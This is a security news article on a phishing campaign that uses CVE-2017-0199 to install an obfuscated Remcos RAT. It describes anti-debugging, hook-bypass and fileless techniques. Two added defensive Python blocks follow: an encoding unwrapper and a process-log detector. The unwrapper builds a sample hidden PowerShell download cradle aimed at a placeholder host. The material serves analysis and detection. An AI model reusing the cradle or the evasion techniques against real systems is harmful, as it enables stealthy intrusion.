Revamped Remcos RAT Deployed Against Microsoft Windows Users
Windows users are at risk of full device takeover by an emerging malicious version of the Remcos remote admin tool, which is being used in an ongoing campaign exploiting a known remote code execution (RCE) vulnerability in Microsoft Office and WordPad.
Threat actors have given the commercially available Remcos remote access tool a new malicious makeover, wrapping its malware code in several layers of varying script languages, including JavaScript, VBScript, and PowerShell, to avoid detection and analysis and achieve full takeover of Microsoft Windows devices.
New findings from Fortinet researcher Xiaopeng Zhang warn Microsoft Windows users about a new campaign using this new-and-improved version of Remcos RAT that exploits a known remote code execution (RCE) vulnerability arising from how unpatched Microsoft Office and WordPad instances parse files.
The attack chain starts with a phishing email intended to lure users into opening an Excel file disguised as a business order, according to the report. Once the file is opened, it exploits the bug (CVE-2017-0199) and downloads the malware payload.
Remcos’ New Version Is Good at Avoiding Analysis
“Its code is wrapped in multiple layers using different script languages and encoding methods, including JavaScript, VBScript, Base64-encoded, URL-encoded, and PowerShell, to protect itself from detection and analysis,” according to the researcher. “Once the downloaded exe file, dllhost.exe, starts, it extracts a batch of files into the %AppData% folder. Some of the key data are hidden in these files.”
From there, the dropper runs a piece of heavily obfuscated PowerShell code that, importantly, runs only in a 32-bit PowerShell process, the report added.
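The layered wrapping the researcher describes (JavaScript, VBScript, Base64, URL encoding, PowerShell) is something an analyst normally peels mechanically before reading the final stage. The following Python is an added example, not code from the Fortinet report or from the campaign: it repeatedly detects and strips one encoding layer at a time (percent-encoding of the kind a JavaScript unescape-style stage produces, plain Base64 as a VBScript stage might carry, and PowerShell's -EncodedCommand, which is Base64 of UTF-16LE text) and reports the order of layers it found. The three-layer sample blob is constructed inside the block; the URL and command in it are placeholders, not indicators from this campaign.

```python
"""Peel nested script-dropper encodings layer by layer.

Added example (not from the Fortinet report): handles percent-encoding,
Base64 carrying UTF-8 or UTF-16LE text, and PowerShell's -EncodedCommand.
"""
import base64
import binascii
import re
import urllib.parse

# PowerShell accepts abbreviated switch names; -e/-ec/-enc all mean -EncodedCommand.
ENC_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")

# Constructed final stage; example.invalid is a reserved placeholder, not a C2.
FINAL = "$u='http://example.invalid/p.bin';$b=(New-Object Net.WebClient).DownloadData($u)"


def _try_base64(s: str):
    """Strictly decode s as Base64, or return None if it is not Base64."""
    s = s.strip()
    if len(s) < 16 or len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def _to_text(raw: bytes):
    """Decode as UTF-16LE when every other byte is NUL (PowerShell style), else UTF-8."""
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        try:
            return raw.decode("utf-16-le"), "utf-16le"
        except UnicodeDecodeError:
            pass
    try:
        return raw.decode("utf-8"), "utf-8"
    except UnicodeDecodeError:
        return None, None


def peel_once(layer: str):
    """Return (layer_kind, inner_text) for one decodable layer, or None if it is plain."""
    m = ENC_CMD_RE.search(layer)
    if m:
        raw = _try_base64(m.group(1))
        if raw is not None:
            text, enc = _to_text(raw)
            if text is not None:
                return f"powershell -EncodedCommand ({enc})", text
    # Require several %XX escapes so a stray "%AppData%" is not mistaken for a layer.
    if len(PCT_RE.findall(layer)) >= 3:
        return "url-encoded", urllib.parse.unquote(layer)
    raw = _try_base64(layer)
    if raw is not None:
        text, enc = _to_text(raw)
        if text is not None:
            return f"base64 ({enc})", text
    return None


def unwrap(blob: str, max_layers: int = 16):
    """Strip layers until plain text remains; returns (layer_kinds, final_text)."""
    kinds, current = [], blob
    for _ in range(max_layers):  # bound the loop in case a layer re-encodes itself
        result = peel_once(current)
        if result is None:
            break
        kind, current = result
        kinds.append(kind)
    return kinds, current


def build_sample() -> str:
    """Constructed three-layer blob mirroring a JS -> VBScript -> PowerShell nesting."""
    enc = base64.b64encode(FINAL.encode("utf-16-le")).decode("ascii")
    stage2 = f"powershell.exe -NoP -W Hidden -EncodedCommand {enc}"
    stage1 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    # Fully percent-encoded, as a JavaScript unescape("%70%6F...") stage would hold it.
    return "".join(f"%{b:02X}" for b in stage1.encode("ascii"))


if __name__ == "__main__":
    found, final = unwrap(build_sample())
    for i, kind in enumerate(found, 1):
        print(f"layer {i}: {kind}")
    print("final stage:", final)
```

The order of checks matters: an -EncodedCommand switch is tested before the generic Base64 test, because the same Base64 alphabet is used for both and only the switch tells you the payload is UTF-16LE. Real droppers also interleave string reversal, character-code arrays and custom XOR, which this unwrapper does not attempt; treat an unpeeled layer as a prompt to inspect manually rather than as plain text.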
Next, the malware runs self-decryption code hidden beneath a rat’s nest (pun intended) of unnecessary code to hinder analysis. But that isn’t the only evasion technique used by the latest version of malicious Remcos RAT. According to the report, the campaign throws up several analysis roadblocks throughout the attack chain, including installing a vectored exception handler and resolving and calling system APIs in an inconsistent, hard-to-track way. It also calls the native Windows API ZwSetInformationThread() to hide its thread from any attached debugger, the report added.
“The malicious code calls API ZwSetInformationThread() with the argument ThreadHideFromDebugger (0x11) and the current thread (0xFFFFFFFE). This mechanism in Windows can conceal a thread’s existence from debuggers,” explained Zhang. “If a debugger is attached to the current process, it exits immediately once the API is called.”
The malware further uses an API hook-bypass technique to avoid detection: rather than calling a monitored API at its entry point, where security tools commonly place inline hooks, it executes the function’s first instructions itself and then jumps past them.
“The malicious code simulates executing multiple API instructions (say, two instructions) at the beginning and then jumps to the API to execute the rest of the instructions (beginning with the 3rd instruction),” according to the report. “Whenever any … detection conditions are triggered, the current process (PowerShell.exe) can become unresponsive, crash, or exit unexpectedly.”
Once ready, the threat actors download an encrypted file containing the malicious version of Remcos RAT, which is decrypted and run in the current process’s memory, effectively making this latest variant fileless, the report pointed out.
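Because the final payload never touches disk, the observable that remains is the process chain that precedes it. As an added example (not the researcher's content or any vendor's rule), the following Python scores constructed Sysmon-style process-creation records for the chain the report lays out: an Office or WordPad parent spawning a child, an executable named dllhost.exe running outside the Windows system directories (the genuine COM surrogate lives in System32 or SysWOW64; that the dropped file runs from a user-writable path is an assumption, since the report does not state where it lands), the 32-bit PowerShell binary under SysWOW64, an -EncodedCommand argument, and any process whose ancestry leads back to an Office parent. Paths, PIDs and the encoded string in the sample log are constructed.

```python
"""Score process-creation telemetry for the chain described in the article.

Added example over constructed Sysmon-style JSON records (one per line); the
field names mirror Sysmon Event ID 1, but the records are not real telemetry.
"""
import json
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "wordpad.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# 32-bit PowerShell on a 64-bit host lives under SysWOW64.
WOW64_POWERSHELL = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s")

# Constructed sample log: PIDs, paths and the Base64 string are placeholders.
SAMPLE_LOG = r'''
{"ProcessId": 100, "ParentProcessId": 10, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "EXCEL.EXE C:\\Users\\alice\\Downloads\\order.xlsx"}
{"ProcessId": 200, "ParentProcessId": 100, "Image": "C:\\Users\\alice\\AppData\\Roaming\\dllhost.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "dllhost.exe"}
{"ProcessId": 300, "ParentProcessId": 200, "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\dllhost.exe", "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIACuALgALgA="}
{"ProcessId": 400, "ParentProcessId": 20, "Image": "C:\\Windows\\System32\\dllhost.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"}
{"ProcessId": 500, "ParentProcessId": 10, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"}
'''


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def parse_log(text: str):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def descends_from_office(events_by_pid, pid: int) -> bool:
    """Walk ParentProcessId links; True if any ancestor is an Office/WordPad image."""
    seen = set()
    ev = events_by_pid.get(pid)
    while ev is not None and ev["ProcessId"] not in seen:  # guard against PID reuse loops
        seen.add(ev["ProcessId"])
        ev = events_by_pid.get(ev["ParentProcessId"])
        if ev is not None and _base(ev["Image"]) in OFFICE_IMAGES:
            return True
    return False


def score_event(ev, events_by_pid):
    """Return the list of findings for one process-creation record."""
    findings = []
    image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
    cmd = ev.get("CommandLine", "")
    if _base(parent) in OFFICE_IMAGES and _base(image) not in OFFICE_IMAGES:
        findings.append("office-spawned-child")
    # A file named after a system binary but outside the system directories.
    if _base(image) == "dllhost.exe" and not image.startswith(SYSTEM_DIRS):
        findings.append("system-binary-name-outside-system-dir")
    if image == WOW64_POWERSHELL:
        findings.append("32bit-powershell")
    if _base(image) in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(cmd):
        findings.append("encoded-command")
    if _base(image) not in OFFICE_IMAGES and descends_from_office(events_by_pid, ev["ProcessId"]):
        findings.append("descends-from-office")
    return findings


def score_log(text: str):
    """Map ProcessId -> findings for every record that triggered at least one check."""
    events = parse_log(text)
    by_pid = {ev["ProcessId"]: ev for ev in events}
    results = {}
    for ev in events:
        findings = score_event(ev, by_pid)
        if findings:
            results[ev["ProcessId"]] = findings
    return results


if __name__ == "__main__":
    for pid, findings in score_log(SAMPLE_LOG).items():
        print(pid, ", ".join(findings))
```

Each check on its own is noisy: 32-bit PowerShell is launched legitimately by some 32-bit applications, and Office does spawn helpers. The value is in the conjunction, which is why the ancestry walk is included; on a real host, alert on a record that carries two or more findings, and remember that PID reuse can break parent links unless you key on the process GUID Sysmon also records.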
Defend With Patching, Training, and Endpoint Protection
“Remcos collects some basic information from the victim’s device,” Zhang added. “It then encrypts and sends the collected data to its C2 server to register that the victim’s device is online and ready to be controlled.”
Anti-analysis and tricky obfuscation techniques aside, Darren Guccione, CEO and founder of Keeper Security, noted in an emailed statement that low-tech phishing and social engineering remain among the most dangerous enterprise cybersecurity threats.
“Preventing these attacks requires a combination of technical defenses and employee awareness,” he wrote. “Recognizing red flags, such as unusual senders, urgent requests and suspicious attachments, can help reduce human error. Regular training and robust security measures empower employees to act as the first line of defense.”
Robust endpoint security should also be a priority to defend against these types of attacks, as well as a basic patch management strategy, according to a statement from Stephen Kowski, field CTO for SlashNext Email Security+.
“Protection requires a multi-faceted approach: keeping Microsoft Office fully patched, implementing advanced email security to detect and block malicious attachments in real time, and deploying modern endpoint security to identify suspicious PowerShell behaviors,” Kowski commented. “Most critically, since this attack relies on social engineering through phishing emails, organizations should ensure their employees receive regular security awareness training focused on identifying suspicious attachments and purchasing order-themed lures.”